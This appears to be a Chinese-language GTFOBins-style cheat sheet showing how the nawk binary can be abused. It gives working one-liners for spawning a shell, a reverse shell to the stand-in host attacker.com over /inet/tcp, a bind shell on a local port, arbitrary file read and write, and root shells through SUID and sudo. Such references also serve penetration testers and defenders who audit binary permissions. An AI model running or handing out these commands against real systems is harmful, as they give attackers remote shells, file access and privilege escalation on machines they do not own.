.. / nawk

shell

用来生成一个交互式的系统shell。

• nawk 'BEGIN {system("/bin/sh")}'

non-interactive-reverse-shell

向监听端口发送一个非交互式反向shell。
在攻击者机器上运行nc -l -p 12345以接收shell。

• Run nc -l -p 12345 on the attacker box to receive the shell.

  RHOST=attacker.com
  RPORT=12345
  nawk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
      s = "/inet/tcp/0/" RHOST "/" RPORT;
      while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
      while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
  

non-interactive-bind-shell

将一个非交互式的shell监听到本地端口，以允许远程网络访问。
运行 nc target.com 12345 来连接到该shell。

• Run nc target.com 12345 on the attacker box to connect to the shell.

  LPORT=12345
  nawk -v LPORT=$LPORT 'BEGIN {
      s = "/inet/tcp/" LPORT "/0/0";
      while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
      while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
  

file-write

将数据写入文件中。

• LFILE=要写入的文件
  nawk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }'
  

file-read

从文件中读取数据。

• LFILE=要读取的文件路径
  nawk '//' "$LFILE"
  

suid

suid是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。

• LFILE=要读取的文件路径
  ./nawk '//' "$LFILE"
  

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

• sudo nawk 'BEGIN {system("/bin/sh")}'

limited-suid

suid是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。

• ./nawk 'BEGIN {system("/bin/sh")}'